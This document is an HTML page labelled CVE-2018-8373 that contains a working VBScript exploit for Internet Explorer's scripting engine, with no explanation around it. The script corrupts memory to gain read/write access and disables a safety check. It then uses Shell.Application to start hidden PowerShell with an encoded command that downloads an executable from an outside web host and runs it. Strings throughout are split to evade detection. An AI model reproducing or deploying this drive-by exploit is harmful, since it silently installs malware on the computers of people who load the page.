CVE-2018-8373

1. <!doctype html>
2. <html lang="en">
3. <head>
4. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
5. <meta http-equiv="x-ua-compatible" content="IE=10">
6. <meta http-equiv="Expires" content="0">
7. <meta http-equiv="Pragma" content="no-cache">
8. <meta http-equiv="Cache-control" content="no-cache">
9. <meta http-equiv="Cache" content="no-cache">
10. </head>
11. <body>
12. <script type="text/vbscript">
13.  
14. Dim max_col
15. Dim index_vul
16. Dim index_a
17. Dim index_b
18. Dim addr
19. Dim array()
20. Dim array2(0,6)
21. Dim util_mem
22. Dim fake_array
23. Dim fake_str
24.  
25. Class Dummy
26. End Class
27.  
28. Class ClassA
29. private Sub Class_Initialize
30. ReDim array(2)
31. 'IsEmpty(array)
32. End Sub
33.  
34. Public Default Property Get P
35. ReDim Preserve array(100000)
36.  
37. For i = 0 To UBound(array2,2)
38. array2(0,i) = 3
39. Next
40. For i = 0 To UBound(array)
41. array(i) = array2
42. Next
43. P=&h0fffffff
44. End Property
45. End Class
46.  
47. Function rw_primit()
48. array(index_vul)(index_a+2,0)=fake_array
49. array(index_b)(0,2)=CDbl("1.740885"+"34731"+"324E-310")
50.  
51. array(index_vul)(index_a,0)=fake_str
52. array(index_b)(0,0)=CDbl("6.365"+"98737437"+"801E-314")
53.  
54. util_mem=array(index_vul)(index_a,0)
55. End Function
56.  
57. Function read
58. read=LenB(array(index_vul)(index_a+2,0)(util_mem+8))
59. End Function
60.  
61. Function GetUnlt32(addr)
62. Dim value
63. array(index_vul)(index_a+2,0)(util_mem+8)=addr +4
64. array(index_vul)(index_a+2,0)(util_mem)=8
65. value=read()
66. array(index_vul)(index_a+2,0)(util_mem)=3
67. GetUnlt32 = value
68. End Function
69.  
70. Set cls = New ClassA
71. array(2)=cls
72.  
73. IsEmpty(array)
74.  
75. max_col=&h0fffffff
76.  
77.  
78. For i=0 To UBound(array)
79. If UBound(array(i),1)-LBound(array(i),1)+1=max_col Then
80. index_vul=i
81. Exit For
82. End If
83. Next
84.  
85.  
86.  
87. For i=0 To UBound(array(index_vul),1)
88. Dim type1 ,type2 ,type3 ,type4
89. type1=VarType(array(index_vul)(i,0))
90. type2=VarType(array(index_vul)(i+1,0))
91. type3=VarType(array(index_vul)(i+3,0))
92. type4=VarType(array(index_vul)(i+4,0))
93. If(type1 = 2 And type2 = 2 And type3 = 3 And type4 = 3) Then
94. index_a=i+3
95. array(index_vul)(index_a,0)="AAAA"
96. Exit For
97. End If
98. Next
99.  
100. For i=0 To UBound(array,1)
101. If array(i)(0,0)=8 Then
102. index_b=i
103. Exit For
104. End If
105. next
106.  
107.  
108.  
109. Set dm = New Dummy
110. Set array(index_vul)(index_a+4,0) = dm
111. array(index_b)(0,4) = CDbl("6.3659"+"87374378"+"01E-314") '3
112. addr=array(index_vul)(index_a+4,0)
113.  
114.  
115. fake_array=Unescape("%u0001%u0"+"880%u000"+"1%u0000%u0"+"000%u0000%u000"+"0%u0000%uffff%u"+"7fff%u00"+"00%u0000")
116. fake_str=Unescape("%u0000"+"%u0000%u"+"0000%u0000%u"+"0000%u0000"+"%u0000%"+"u0000")
117. rw_primit()
118.  
119.  
120. Dim psection
121. psection = GetUnlt32(addr+&hc)
122. dim a
123. a=psection+4
124.  
125. Dim p_C0leScript
126. p_C0leScript=GetUnlt32(a)
127. a=p_C0leScript+&h174
128. array(index_vul)(index_a+2,0)(a-8)=0
129. Set Object = CreateObject("Sh"+"ell.Appl"+"ication")
130. Object.ShellExecute "powe"+"rshel"+"l.ex"+"e -Window"+"Style Hi"+"dden -encod"+"edCo"+"mmand ""KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AeQBzAHcAYwBkAC4AYwBvAG0ALwB2AG8AbAAvAHMAMQAuAGUAeABlACcALAAgACcAYwA6AC8AdwBpAG4AZABvAHcAcwAvAHQAZQBtAHAALwBhAHQAdQBtADIAbAAuAGUAeABlACcAKQA7AGMAOgAvAHcAaQBuAGQAbwB3AHMALwB0AGUAbQBwAC8AYQB0AHUAbQAyAGwALgBlAHgAZQA="""
131.  
132. </script>
133. </body>
134. </html>